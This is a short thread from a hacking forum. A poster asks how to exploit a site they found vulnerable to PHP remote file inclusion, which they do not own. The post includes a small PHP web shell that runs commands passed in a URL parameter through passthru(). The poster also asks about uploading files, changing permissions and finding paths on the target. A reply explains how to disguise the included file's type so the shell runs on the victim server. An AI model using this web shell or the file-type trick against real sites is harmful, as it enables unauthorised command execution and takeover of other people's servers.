Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.
Php injections
I found a site which is vulnerable for Php injections atack. If I use script like:
$cmd = $_GET['command'];
echo $cmd;
if ($cmd){
passthru($cmd);
}
?>```
and enter into ls command I get list from my server not atack server. Any solution. Also I am interested in uploading files, how can I change permission for upload and how can I get path? (for permission I could chmod from uper script but - same problem. To get path I could excecute include error (same problem - it shows error on my server) or use getcwd().
Is there any possible solution, except overwritting one of server files with upper script?
Tnx
Yup. In this case, the libjpeg parser and apache handlers have no effect on it, as the file is being included as raw text. By including a PHP type with normal mime types, your telling the server to do a GET on it, and when the mime types are set correctly, it executes the script and then draws its output to your file, and thus echos it.
You can give it any filetype you want, as long as it isn't parsed by either server as types like ASP, PHP, HTML, or anything with a mimetype that would give it an effect on the originating server.
I should put up my PHP injections article from Rohitab and HTS on here soon. I'll do that later.